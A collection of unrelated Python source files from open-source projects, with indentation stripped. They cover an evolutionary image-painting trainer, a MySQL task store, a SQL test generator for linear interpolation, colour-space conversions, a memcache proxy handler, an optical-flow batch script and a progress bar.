fn_width, fn_height = Image.open(fn).size
if hint_height <= 0:
if hint_width <= 0:
inferred_height, inferred_width = fn_height, fn_width # use target image's size
else: # hint_width is valid
inferred_width = hint_width
inferred_height = hint_width * fn_height // fn_width
else: # hint_height is valid
if hint_width <= 0:
inferred_height = hint_height
inferred_width = hint_height * fn_width // fn_height
else: # hint_width is valid
inferred_height, inferred_width = hint_height, hint_width # use hint size
print(f'Inferring height and width. '
f'Hint: {hint_height, hint_width}, File: {fn_width, fn_height}, Inferred: {inferred_height, inferred_width}')
return inferred_height, inferred_width
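# Worked example (added; not in the original file): for a 400x200 (width x height)
# target image with hints height=100, width=-1, the branch above preserves the
# aspect ratio and returns inferred (height, width) == (100, 200).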
def training_loop(args):
height, width = infer_height_and_width(args.height, args.width, args.target_fn)
painter = TrianglesPainter(
h=height,
w=width,
n_triangle=args.n_triangle,
alpha_scale=args.alpha_scale,
coordinate_scale=args.coordinate_scale,
)
target_arr = load_target(args.target_fn, (height, width))
save_as_png(os.path.join(args.working_dir, 'target'), arr2img(target_arr))
hooks = [
(args.step_report_interval, PrintStepHook()),
(args.report_interval, PrintCostHook()),
(args.report_interval, SaveCostHook(save_fp=os.path.join(args.working_dir, 'cost.txt'))),
(
args.report_interval,
StoreImageHook(
render_fn=lambda params: painter.render(params, background='white'),
save_fp=os.path.join(args.working_dir, 'animate-background=white'),
fps=args.fps,
save_interval=args.save_as_gif_interval,
),
),
(args.report_interval, ShowImageHook(render_fn=lambda params: painter.render(params, background='white'))),
]
allowed_solver = ['pgpe']
if args.solver not in allowed_solver:
raise ValueError(f'Only following solver(s) is/are supported: {allowed_solver}')
solver = None
if args.solver == 'pgpe':
solver = PGPE(
solution_length=painter.n_params,
popsize=args.n_population,
optimizer='clipup',
optimizer_config={'max_speed': 0.15},
)
else:
raise ValueError()
tell_fn = get_tell_fn(args.solver)
best_params_fn = get_best_params_fn(args.solver)
loss_type = args.loss_type
# fitnesses_fn is OK to be inefficient as it's for hook's use only.
fitnesses_fn = lambda fitness_fn, solutions: [fitness_fn(_, painter, target_arr, loss_type) for _ in solutions]
n_iterations = args.n_iterations
mp_batch_size = args.mp_batch_size
proc_pool = mp.Pool(processes=mp.cpu_count(), initializer=init_worker, initargs=(painter, target_arr, loss_type))
for i in range(1, 1 + n_iterations):
solutions = solver.ask()
batch_it = (solutions[start:start + mp_batch_size] for start in range(0, len(solutions), mp_batch_size))
batch_output = proc_pool.imap(func=batch_fitness_fn_by_workers, iterable=batch_it)
fitnesses = [item for batch in batch_output for item in batch]
tell_fn(solver, solutions, fitnesses)
for hook in hooks:
trigger_interval, hook_fn_or_obj = hook
if i % trigger_interval == 0:
hook_fn_or_obj(i, solver, fitness_fn, fitnesses_fn, best_params_fn)
for hook in hooks:
_, hook_fn_or_obj = hook
if hasattr(hook_fn_or_obj, 'close') and callable(hook_fn_or_obj.close):
hook_fn_or_obj.close()
proc_pool.close()
proc_pool.join()
def main():
cmd_args = parse_cmd_args()
args = parse_args(cmd_args)
pre_training_loop(args)
if args.profile:
cProfile.runctx('training_loop(args)', globals(), locals(), sort='cumulative')
else:
training_loop(args)
if __name__ == "__main__":
mp.set_start_method('spawn')
main()
|
pyspider/database/mysql/taskdb.py
|
zgwcome/pyspider
| 13,935 |
75307
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<<EMAIL>>
# http://binux.me
# Created on 2014-07-17 18:53:01
import re
import six
import time
import json
import mysql.connector
from pyspider.libs import utils
from pyspider.database.base.taskdb import TaskDB as BaseTaskDB
from pyspider.database.basedb import BaseDB
from .mysqlbase import MySQLMixin, SplitTableMixin
class TaskDB(MySQLMixin, SplitTableMixin, BaseTaskDB, BaseDB):
__tablename__ = ''
def __init__(self, host='localhost', port=3306, database='taskdb',
user='root', passwd=<PASSWORD>):
self.database_name = database
self.conn = mysql.connector.connect(user=user, password=<PASSWORD>,
host=host, port=port, autocommit=True)
if database not in [x[0] for x in self._execute('show databases')]:
self._execute('CREATE DATABASE %s' % self.escape(database))
self.conn.database = database
self._list_project()
def _create_project(self, project):
assert re.match(r'^\w+$', project) is not None
tablename = self._tablename(project)
if tablename in [x[0] for x in self._execute('show tables')]:
return
self._execute('''CREATE TABLE IF NOT EXISTS %s (
`taskid` varchar(64) PRIMARY KEY,
`project` varchar(64),
`url` varchar(1024),
`status` int(1),
`schedule` BLOB,
`fetch` BLOB,
`process` BLOB,
`track` BLOB,
`lastcrawltime` double(16, 4),
`updatetime` double(16, 4),
INDEX `status_index` (`status`)
) ENGINE=InnoDB CHARSET=utf8''' % self.escape(tablename))
def _parse(self, data):
for key, value in list(six.iteritems(data)):
if isinstance(value, (bytearray, six.binary_type)):
data[key] = utils.text(value)
for each in ('schedule', 'fetch', 'process', 'track'):
if each in data:
if data[each]:
data[each] = json.loads(data[each])
else:
data[each] = {}
return data
def _stringify(self, data):
for each in ('schedule', 'fetch', 'process', 'track'):
if each in data:
data[each] = json.dumps(data[each])
return data
def load_tasks(self, status, project=None, fields=None):
if project and project not in self.projects:
return
where = "`status` = %s" % self.placeholder
if project:
projects = [project, ]
else:
projects = self.projects
for project in projects:
tablename = self._tablename(project)
for each in self._select2dic(
tablename, what=fields, where=where, where_values=(status, )
):
yield self._parse(each)
def get_task(self, project, taskid, fields=None):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return None
where = "`taskid` = %s" % self.placeholder
tablename = self._tablename(project)
for each in self._select2dic(tablename, what=fields, where=where, where_values=(taskid, )):
return self._parse(each)
return None
def status_count(self, project):
result = dict()
if project not in self.projects:
self._list_project()
if project not in self.projects:
return result
tablename = self._tablename(project)
for status, count in self._execute("SELECT `status`, count(1) FROM %s GROUP BY `status`" %
self.escape(tablename)):
result[status] = count
return result
def insert(self, project, taskid, obj={}):
if project not in self.projects:
self._list_project()
if project not in self.projects:
self._create_project(project)
self._list_project()
obj = dict(obj)
obj['taskid'] = taskid
obj['project'] = project
obj['updatetime'] = time.time()
tablename = self._tablename(project)
return self._insert(tablename, **self._stringify(obj))
def update(self, project, taskid, obj={}, **kwargs):
if project not in self.projects:
self._list_project()
if project not in self.projects:
raise LookupError
tablename = self._tablename(project)
obj = dict(obj)
obj.update(kwargs)
obj['updatetime'] = time.time()
return self._update(
tablename,
where="`taskid` = %s" % self.placeholder,
where_values=(taskid, ),
**self._stringify(obj)
)
|
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/m/member/member_checks_typed_annotations.py
|
ciskoinch8/vimrc
| 463 |
75318
|
# pylint: disable=missing-docstring,invalid-name,too-few-public-methods
class A:
myfield: int
class B(A):
pass
class C:
pass
class D(C, B):
pass
a = A()
print(a.myfield)
b = B()
print(b.myfield)
d = D()
print(d.myfield)
c = C()
print(c.myfield) # [no-member]
|
src/include/catalog/li_extras.py
|
wapache-org/greenplum-gpdb
| 5,535 |
75324
|
#! /usr/local/bin/python
import sys
import datetime
import pdb
#pdb.set_trace()
# Test and declaration generator for linear_interpolation
# Utility
def kwot(s):
"""Single quote a string, doubling contained quotes as needed."""
return "'" + "''".join(s.split("'")) + "'"
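# Illustrative example: kwot("it's") returns "'it''s'", i.e. the embedded
# quote is doubled and the whole value is wrapped in single quotes for SQL.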
# Following section is just fragile helper functions to produce triples
# of values (v0, v, v1) such that, for any choice of scale and transform
# (scale applied first, transform last):
#
# (v-v0)/(v1-v) = p1/p2
#
# The idea is that, by keeping p1 and p2 uniform in a test set, we can
# know the result of linear interpolation independently of the actual
# function linear_interpolate and include it in the regressions to make
# it easy to identify issues.
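# Worked example (values chosen for illustration): int_triple(1, 4, 100, 100)
# yields (100, 200, 600), and (200-100)/(600-200) == 1/4 == p1/p2, so the
# expected interpolation result is known without calling linear_interpolate.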
def int_triple(p1, p2, scale, transform):
return tuple( [x*scale + transform for x in [0, p1, p1+p2]] )
def num_triple(p1, p2, scale, transform):
return tuple( [str(x) for x in int_triple(p1, p2, scale, transform)] )
def date_triple(p1, p2, scale, transform, basedate):
i = int_triple(p1, p2, scale, transform)
g = basedate.toordinal()
d = [datetime.date.fromordinal(x + g) for x in i]
return tuple( [kwot(x.isoformat()) for x in d] )
def time_offset_by_minutes(t, d):
x = t.hour * 60 + t.minute + d
h = x / 60
m = x - 60 * h
h = h - 24 * (h / 24)
return datetime.time(hour = h, minute = m)
def time_triple(p1, p2, scale, transform, basetime):
i = int_triple(p1, p2, scale, transform)
t = [ time_offset_by_minutes(basetime, x) for x in i]
return tuple( [kwot(x.isoformat()) for x in t] )
def datetime_triple(p1, p2, scale, transform, basestamp):
i = int_triple(p1, p2, scale, transform)
d = [ datetime.timedelta(minutes=x) for x in i ]
return [ kwot( (basestamp + x).isoformat() ) for x in d]
def interval_triple(p1, p2, scale, transform, baseminutes):
i = int_triple(p1, p2, scale, transform+baseminutes)
return tuple( [ kwot(str(x) + ' minutes') for x in i ] )
# The following table drives tests and declarations per data type.
# The keys are type SQL type names that are known to cattulus.pl.
# The values are tuples of
# - a 3-tuple of values in SQL form (no casts): low, middle, high.
# - a 3-tuple of proportionally spread values like the first.
# - an appropriate C type declarator (beware Interval's pointer-ness).
# - position as in index into array of types.
#
# The position value is important to ensure OID consistency.
#
# The delta values fix the proportions of the 3-tuple values.
delta1 = 1
delta2 = 4
type_dict = {
'int8' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'int64',
0),
'int4' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'int32',
1),
'int2' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'int2',
2),
'float8' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'float8',
3),
'float4' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'float4',
4),
'date' : (
date_triple(delta1, delta2, 10, 10, datetime.date(2001, 1, 1)),
date_triple(delta1, delta2, 10, 20, datetime.date(2010, 1, 1)),
'DateADT',
5),
'time' : (
time_triple(delta1, delta2, 5, 20, datetime.time(hour=10)),
time_triple(delta1, delta2, 10, 300, datetime.time(hour=10)),
'TimeADT',
6),
'timestamp' : (
datetime_triple(delta1, delta2, 1000, 2000, datetime.datetime(2010, 1, 1)),
datetime_triple(delta1, delta2, 5000, 1000, datetime.datetime(2012, 6, 1)),
'Timestamp',
7),
'timestamptz' : (
datetime_triple(delta1, delta2, 1000, 2000, datetime.datetime(2010, 1, 1)),
datetime_triple(delta1, delta2, 5000, 1000, datetime.datetime(2012, 6, 1)),
'TimestampTz',
8),
'interval' : (
interval_triple(delta1, delta2, 20, 10, 55),
interval_triple(delta1, delta2, 10, 20, 30),
'Interval',
9),
'numeric' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'Numeric',
10),
}
# For OID assignment we choose to order the types and assign ascending
# OID values starting from a base. The caller is responsible for setting
# base and maintaining the order of assignment.
oid_base = 6072
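# For example, with oid_base = 6072, 'int8' (position 0) is assigned OID 6072,
# 'int4' (position 1) gets 6073, and so on through 'numeric' (position 10).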
def ordered_types():
"""List of types in canonical order of OID assignment."""
keys = type_dict.keys()
ordered_keys = [None for k in keys]
for key in keys:
pos = type_dict[key][3]
ordered_keys[pos] = key
assert not None in ordered_keys
return ordered_keys
# Convenient wrapper for one of the table's 3-tuples.
class Coordinate(object):
def __init__(self, ctype, lmhtuple):
self._type = ctype
(self._low, self._mid, self._high) = lmhtuple
def low(self):
return self._low + '::' + self._type
def mid(self):
return self._mid + '::' + self._type
def high(self):
return self._high + '::' + self._type
def linear_interpolate(x, y, x0, y0, x1, y1):
"""Format a call to linear_interpolate for the given arguments and expected result.
"""
fmt = """
select
linear_interpolate({x}, {x0}, {y0}, {x1}, {y1}),
{y} as answer,
{y} = linear_interpolate({x}, {x0}, {y0}, {x1}, {y1}) as match ;"""
return fmt.format(x=x, y=y, x0=x0, y0=y0, x1=x1, y1=y1)
def preliminary_tests(verbose):
""" Preliminary tests (SQL), optionally verbose, as '\n'-delimited string.
"""
prelim = """
-- A "generic" unsupported type.
select linear_interpolate('x'::text, 'x0'::text, 0, 'x1'::text, 1000);
select linear_interpolate(5, 0, 'y0'::text, 100, 'y1'::text);
-- Check that "divide by zero" returns null"""
prelim = prelim.split('\n')
fmt = """select linear_interpolate({x}, {x0}, {y0}, {x1}, {y1});"""
for t in type_dict:
a = Coordinate(t, type_dict[t][0])
o = Coordinate('int4', type_dict['int4'][1])
s = fmt.format(x=a.mid(), x0=a.low(), y0=o.low(), x1=a.low(), y1=o.high())
prelim = prelim + s.split('\n')
return '\n'.join(prelim)
def basic_tests(abscissa_type, ordinate_type, verbose):
"""Per-type tests (SQL), optionally verbose, as '\n'-delimited string.
"""
abscissa = Coordinate(abscissa_type, type_dict[abscissa_type][0])
ordinate = Coordinate(ordinate_type, type_dict[ordinate_type][1])
if verbose:
lst = [
'',
'\qecho',
'\qecho Check interpolation correctness: %s --> %s' % (abscissa_type, ordinate_type),
]
prolog = []
else:
lst = []
prolog = [
'',
'',
'-- Abscissa: %s, Ordinate: %s' % (abscissa_type, ordinate_type),
'-- Check correctness - all results should have match = t'
]
# Use the triples in all combinations to test outlying cases as well as "sweet
# spot" cases.
tst = linear_interpolate(
abscissa.mid(), ordinate.mid(),
abscissa.low(), ordinate.low(),
abscissa.high(), ordinate.high() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.mid(), ordinate.mid(),
abscissa.high(), ordinate.high(),
abscissa.low(), ordinate.low() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.low(), ordinate.low(),
abscissa.mid(), ordinate.mid(),
abscissa.high(), ordinate.high() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.low(), ordinate.low(),
abscissa.high(), ordinate.high(),
abscissa.mid(), ordinate.mid() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.high(), ordinate.high(),
abscissa.mid(), ordinate.mid(),
abscissa.low(), ordinate.low() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.high(), ordinate.high(),
abscissa.low(), ordinate.low(),
abscissa.mid(), ordinate.mid() )
lst = lst + tst.split('\n')
# Include one trivial case
tst = linear_interpolate(
abscissa.mid(), ordinate.mid(),
abscissa.mid(), ordinate.mid(),
abscissa.mid(), ordinate.mid() )
lst = lst + tst.split('\n')
return '\n'.join(prolog + lst)
def all_tests(verbose):
result = preliminary_tests(verbose)
for abscissa_type in type_dict:
result = result + basic_tests(abscissa_type, 'int4', verbose)
for ordinate_type in type_dict:
result = result + basic_tests('int4', ordinate_type, verbose)
return result
def regression_tests():
return all_tests(False)
def readable_tests():
return all_tests(True)
declared_description = 'linear interpolation: x, x0,y0, x1,y1'
def pg_proc_declarations():
template = """
CREATE FUNCTION linear_interpolate(
anyelement,
anyelement,
{T},
anyelement,
{T}
)
RETURNS {T}
LANGUAGE internal IMMUTABLE STRICT
AS 'linterp_{t}'
WITH (OID={oid}, DESCRIPTION="{desc}");"""
result = ['-- for cdb_pg/src/include/catalog/pg_proc.sql', '']
fmt = ' '.join([x.strip() for x in template.split('\n')])
next_oid = oid_base
all_types = ordered_types()
for sql_type in all_types:
c_type = type_dict[sql_type][2]
result = result + [fmt.format(T=sql_type, t=c_type, oid=str(next_oid), desc=declared_description)]
next_oid = next_oid + 1
return '\n'.join(result)
def upgrade_declarations():
upgrade_1 = """
CREATE FUNCTION @[email protected]_interpolate(
anyelement,
anyelement,
{T},
anyelement,
{T}
)
RETURNS {T}
LANGUAGE internal IMMUTABLE STRICT
AS 'linterp_{t}'
WITH (OID={oid}, DESCRIPTION="{desc}");"""
upgrade_2 = """
COMMENT ON FUNCTION @[email protected]_interpolate(
anyelement,
anyelement,
{T},
anyelement,
{T}
)
IS '{desc}';"""
result = ['-- for src/test/regress/data/upgradeXX/upg2_catupgrade_XXX.sql.in', '']
upg_1 = ' '.join([x.strip() for x in upgrade_1.split('\n')])
upg_2 = ' '.join([x.strip() for x in upgrade_2.split('\n')])
next_oid = oid_base
all_types = ordered_types()
for sql_type in all_types:
c_type = type_dict[sql_type][2]
result.append( upg_1.format(T=sql_type, t=c_type, oid=str(next_oid), desc=declared_description) )
result.append( upg_2.format(T=sql_type, t=c_type, oid=str(next_oid), desc=declared_description) )
result.append( '' )
next_oid = next_oid + 1
return '\n'.join(result)
#
# Interpret the arguments, write result to standard out.
def main():
argmap = {
'readable' : readable_tests,
'regression' : regression_tests,
'pg_proc' : pg_proc_declarations,
'upgrade' : upgrade_declarations
}
efmt = 'argument must be one of (%s), not "%s"' % (', '.join(argmap.keys()), "%s")
if len(sys.argv) == 1:
fn = argmap['readable']
elif len(sys.argv) == 2 and sys.argv[1] in argmap:
fn = argmap[sys.argv[1]]
else:
sys.exit(efmt % ' '.join(sys.argv[1:]))
print fn()
if __name__ == '__main__':
main()
|
pyzx/graph/graph.py
|
mnm-team/pyzx-heuristics
| 219 |
75336
|
# PyZX - Python library for quantum circuit rewriting
# and optimization using the ZX-calculus
# Copyright (C) 2018 - <NAME> and <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from .base import BaseGraph
from .graph_s import GraphS
try:
import quizx # type: ignore
except ImportError:
quizx = None
backends = { 'simple': True, 'quizx-vec': True }
def Graph(backend:Optional[str]=None) -> BaseGraph:
"""Returns an instance of an implementation of :class:`~pyzx.graph.base.BaseGraph`.
By default :class:`~pyzx.graph.graph_s.GraphS` is used.
    Currently ``backend`` is allowed to be `simple` (the default) or
    `quizx-vec`; `graph_tool` and `igraph` are also accepted when the
    corresponding optional packages are installed.
This method is the preferred way to instantiate a ZX-diagram in PyZX.
Example:
To construct an empty ZX-diagram, just write::
g = zx.Graph()
"""
if backend is None: backend = 'simple'
if backend not in backends:
raise KeyError("Unavailable backend '{}'".format(backend))
if backend == 'simple': return GraphS()
if backend == 'graph_tool':
return GraphGT()
if backend == 'igraph': return GraphIG()
if backend == 'quizx-vec': return quizx.VecGraph() # type: ignore
return GraphS()
Graph.from_json = GraphS.from_json # type: ignore
Graph.from_tikz = GraphS.from_tikz # type: ignore
try:
import graph_tool.all as gt
from .graph_gt import GraphGT
backends['graph_tool'] = gt
except ImportError:
pass
try:
import igraph as ig
from .graph_ig import GraphIG
backends['igraph'] = ig
except ImportError:
pass
|
Hard/same-bsts.py
|
SaumyaRai2010/algoexpert-data-structures-algorithms
| 152 |
75344
|
# SAME BSTS
# O(N^2) time and space
def sameBsts(arrayOne, arrayTwo):
# Write your code here.
if len(arrayOne) != len(arrayTwo):
return False
if len(arrayOne) == 0:
return True
if arrayOne[0] != arrayTwo[0]:
return False
leftSubtreeFirst = [num for num in arrayOne[1:] if num < arrayOne[0]]
rightSubtreeFirst = [num for num in arrayOne[1:] if num >= arrayOne[0]]
leftSubtreeSecond = [num for num in arrayTwo[1:] if num < arrayTwo[0]]
rightSubtreeSecond = [num for num in arrayTwo[1:] if num >= arrayTwo[0]]
return sameBsts(leftSubtreeFirst, leftSubtreeSecond) and sameBsts(rightSubtreeFirst, rightSubtreeSecond)
# O(N^2) time and O(d) space
def sameBsts(arrayOne, arrayTwo):
# Write your code here.
return areSameBsts(arrayOne, arrayTwo, 0, 0, float('-inf'), float('inf'))
def areSameBsts(arrayOne, arrayTwo, rootIdxOne, rootIdxTwo, minVal, maxVal):
if rootIdxOne == -1 or rootIdxTwo == -1:
return rootIdxOne == rootIdxTwo
if arrayOne[rootIdxOne] != arrayTwo[rootIdxTwo]:
return False
leftRootIdxOne = getIdxOfFirstSmaller(arrayOne, rootIdxOne, minVal)
leftRootIdxTwo = getIdxOfFirstSmaller(arrayTwo, rootIdxTwo, minVal)
rightRootIdxOne = getIdxOfFirstBiggerOrEqual(arrayOne, rootIdxOne, maxVal)
rightRootIdxTwo = getIdxOfFirstBiggerOrEqual(arrayTwo, rootIdxTwo, maxVal)
currentValue = arrayOne[rootIdxOne]
leftAreSame = areSameBsts(arrayOne, arrayTwo, leftRootIdxOne, leftRootIdxTwo, minVal, currentValue)
rightAreSame = areSameBsts(arrayOne, arrayTwo, rightRootIdxOne, rightRootIdxTwo, currentValue, maxVal)
return leftAreSame and rightAreSame
def getIdxOfFirstSmaller(array, startingIdx, minVal):
for i in range(startingIdx + 1, len(array)):
if array[i] < array[startingIdx] and array[i] >= minVal:
return i
return -1
def getIdxOfFirstBiggerOrEqual(array, startingIdx, maxVal):
for i in range(startingIdx + 1, len(array)):
if array[i] >= array[startingIdx] and array[i] < maxVal:
return i
return -1
|
colour/models/rgb/hanbury2003.py
|
rift-labs-developer/colour
| 1,380 |
75354
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
"""
IHLS Colour Encoding
====================
Defines the :math:`IHLS` (Improved HLS) colourspace related transformations:
- :func:`colour.RGB_to_IHLS`
- :func:`colour.IHLS_to_RGB`
References
----------
- :cite:`Hanbury2003` : <NAME>. (2003). A 3D-Polar Coordinate Colour
Representation Well Adapted to Image Analysis. In <NAME> & <NAME>
(Eds.), Image Analysis (pp. 804–811). Springer Berlin Heidelberg.
ISBN:978-3-540-45103-7
"""
import numpy as np
from colour.algebra import vector_dot
from colour.utilities import (from_range_1, to_domain_1, tstack, tsplit, zeros)
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = ['RGB_to_IHLS', 'IHLS_to_RGB']
MATRIX_RGB_TO_YC_1_C_2 = np.array([
[0.2126, 0.7152, 0.0722],
[1, -0.5, -0.5],
[0, -np.sqrt(3) / 2, np.sqrt(3) / 2],
])
"""
*RGB* colourspace to *YC_1C_2* colourspace matrix.
MATRIX_RGB_TO_YC_1_C_2 : array_like, (3, 3)
"""
MATRIX_YC_1_C_2_TO_RGB = np.linalg.inv(MATRIX_RGB_TO_YC_1_C_2)
"""
*YC_1C_2* colourspace to *RGB* colourspace matrix.
MATRIX_YC_1_C_2_TO_RGB : array_like, (3, 3)
"""
def RGB_to_IHLS(RGB):
"""
Converts from *RGB* colourspace to *IHLS* (Improved HLS) colourspace.
Parameters
----------
RGB : array-like
*RGB* colourspace array.
Returns
-------
ndarray
*HYS* colourspace array.
Notes
-----
+------------+-----------------------+---------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``RGB`` | [0, 1] | [0, 1] |
+------------+-----------------------+---------------+
+------------+-----------------------+---------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``HYS`` | [0, 1] | [0, 1] |
+------------+-----------------------+---------------+
References
----------
:cite:`Hanbury2003`
Examples
--------
>>> RGB = np.array([0.45595571, 0.03039702, 0.04087245])
>>> RGB_to_IHLS(RGB) # doctest: +ELLIPSIS
array([ 6.2616051..., 0.1216271..., 0.4255586...])
"""
RGB = to_domain_1(RGB)
R, G, B = tsplit(RGB)
Y, C_1, C_2 = tsplit(vector_dot(MATRIX_RGB_TO_YC_1_C_2, RGB))
C = np.sqrt(C_1 ** 2 + C_2 ** 2)
acos_C_1_C_2 = zeros(C.shape)
acos_C_1_C_2[C != 0] = np.arccos(C_1[C != 0] / C[C != 0])
H = np.where(C_2 <= 0, acos_C_1_C_2, (np.pi * 2) - acos_C_1_C_2)
S = np.maximum(np.maximum(R, G), B) - np.minimum(np.minimum(R, G), B)
HYS = tstack([H, Y, S])
return from_range_1(HYS)
def IHLS_to_RGB(HYS):
"""
Converts from *IHLS* (Improved HLS) colourspace to *RGB* colourspace.
Parameters
----------
HYS : array-like
*IHLS* colourspace array.
Returns
-------
ndarray
*RGB* colourspace array.
Notes
-----
+------------+-----------------------+---------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``HYS`` | [0, 1] | [0, 1] |
+------------+-----------------------+---------------+
+------------+-----------------------+---------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``RGB`` | [0, 1] | [0, 1] |
+------------+-----------------------+---------------+
References
----------
:cite:`Hanbury2003`
Examples
--------
>>> HYS = np.array([6.26160518, 0.12162712, 0.42555869])
>>> IHLS_to_RGB(HYS) # doctest: +ELLIPSIS
array([ 0.4559557..., 0.0303970..., 0.0408724...])
"""
H, Y, S = tsplit(to_domain_1(HYS))
pi_3 = np.pi / 3
k = np.floor(H / (pi_3))
H_s = H - k * (pi_3)
C = (np.sqrt(3) * S) / (2 * np.sin((2 * pi_3) - H_s))
C_1 = C * np.cos(H)
C_2 = -C * np.sin(H)
RGB = vector_dot(MATRIX_YC_1_C_2_TO_RGB, tstack([Y, C_1, C_2]))
return from_range_1(RGB)
|
vaurien/protocols/memcache.py
|
mozilla-libs/vaurien
| 131 |
75387
|
<reponame>mozilla-libs/vaurien<gh_stars>100-1000
import re
from vaurien.protocols.base import BaseProtocol
from vaurien.util import chunked
RE_LEN = re.compile('Content-Length: (\d+)', re.M | re.I)
RE_KEEPALIVE = re.compile('Connection: Keep-Alive')
RE_MEMCACHE_COMMAND = re.compile('(.*)\r\n')
EOH = '\r\n\r\n'
CRLF = '\r\n'
class Memcache(BaseProtocol):
"""Memcache protocol.
"""
name = 'memcache'
def _handle(self, source, dest, to_backend, on_between_handle):
# https://github.com/memcached/memcached/blob/master/doc/protocol.txt
# Sending the query
buffer = self._get_data(source)
if not buffer:
self._abort_handling(to_backend, dest)
return
# sending the first packet
dest.sendall(buffer)
on_between_handle()
# finding the command we sent.
cmd = RE_MEMCACHE_COMMAND.search(buffer)
if cmd is None:
# wat ?
self._abort_handling(to_backend, dest)
return
# looking at the command
cmd = cmd.groups()[0]
buffer_size = self.option('buffer')
cmd_parts = cmd.split()
mcmd = cmd_parts[0]
if mcmd in ('set', 'add', 'replace', 'append'):
cmd_size = len(cmd) + len(CRLF)
data_size = int(cmd_parts[-1])
total_size = cmd_size + data_size
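            # Illustrative example (request contents assumed): for
            # "set mykey 0 0 5\r\nhello\r\n", cmd is "set mykey 0 0 5",
            # so cmd_size = 15 + 2 and data_size = 5, giving total_size = 22;
            # the CRLF terminating the data block is added below when
            # computing left_to_read.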
# grabbing more data if needed
left_to_read = total_size - len(buffer) + len(CRLF)
if left_to_read > 0:
for chunk in chunked(left_to_read, buffer_size):
data = source.recv(chunk)
buffer += data
dest.sendall(data)
# Receiving the response now
buffer = self._get_data(dest, buffer_size)
source.sendall(buffer)
if buffer.startswith('VALUE'):
# we're getting back a value.
EOW = 'END' + CRLF
else:
EOW = CRLF
while not buffer.endswith(EOW):
data = self._get_data(dest, buffer_size)
buffer += data
source.sendall(data)
# we're done
return True # keeping connected
|
dataset_preprocessing/generate_OF_FDD.py
|
malikhussain72/cnn_fall-detection
| 183 |
75402
|
import os
import cv2
import glob
import sys
sys.path.append('/usr/local/lib/python2.7/site-packages/')
#os.system('/home/adrian/dense_flow/build/extract_cpu -f={} -x={} -y={} -i=tmp/image -b 20 -t 1 -d 3 -o=dir'.format('test.avi', '/flow_x', '/flow_y'))
data_folder = 'FDD_images/'
output_path = 'FDD_OF/'
i = 0
if not os.path.exists(output_path):
os.mkdir(output_path)
folders = [f for f in os.listdir(data_folder) if os.path.isdir(os.path.join(data_folder, f))]
folders.sort()
for folder in folders:
event_folders = [f for f in os.listdir(data_folder + folder) if os.path.isdir(os.path.join(data_folder + folder + '/', f))]
event_folders.sort()
for event_folder in event_folders:
path = data_folder + folder + '/' + event_folder
flow = output_path + folder + '/' + event_folder
if not os.path.exists(flow):
os.makedirs(flow)
os.system('/home/anunez/dense_flow2/build/extract_cpu -f={} -x={} -y={} -i=tmp/image -b=20 -t=1 -d=0 -s=1 -o=dir'.format(path, flow + '/flow_x', flow + '/flow_y'))
|
toad/utils/progress.py
|
wolaituodiban/toad
| 325 |
75446
|
import sys
from time import time
class Progress:
"""
"""
def __init__(self, iterable, size = None, interval = 0.1):
"""
Args:
iterable
size (int): max size of iterable
            interval (float): bar update interval in seconds, default is `0.1`
        Attrs:
            BAR_LENGTH (int): bar length, default is `32`
            SYMBOL_DONE (str): symbol indicating the completed portion
            SYMBOL_REST (str): symbol indicating the remaining portion
prefix (str): string template before progress bar
suffix (str): string template after progress bar
template (str): string template for rendering, `{prefix} {bar} {suffix}`
"""
self.iterable = iterable
self.interval = interval
self.batch = 1
self.size = size
if hasattr(iterable, '__len__'):
self.size = len(iterable)
# is pytorch dataloader
if hasattr(iterable, 'batch_size'):
self.batch = getattr(iterable, 'batch_size')
self.size = len(iterable.dataset)
self.idx = 0
self.time = None
self.BAR_LENGTH = 32
self.SYMBOL_DONE = '█'
self.SYMBOL_REST = '.'
self.prefix = ""
self.suffix = ""
if self.size is None:
self.template = "{prefix} {done} iters {time:.2f}s {suffix}"
else:
self.template = "{prefix} {percent:3.0f}%|{bar}| [{done}/{size}] {time:.2f}s {suffix}"
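    # Illustrative usage (names assumed, not part of the original file):
    #     for batch in Progress(loader, interval=0.5):
    #         train_step(batch)
    # which renders a console bar built from SYMBOL_DONE / SYMBOL_REST above.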
def __len__(self):
return self.size
def __iter__(self):
self.reset()
# reset time
start = time()
last_time = start
for item in self.iterable:
yield item
self.idx += 1
curr_time = time()
self.time = curr_time - start
# skip update if delta is too small
if curr_time - last_time < self.interval:
continue
last_time = curr_time
# update bar
self.flush()
# finally updating for the status of end
self.flush()
self.end()
def reset(self):
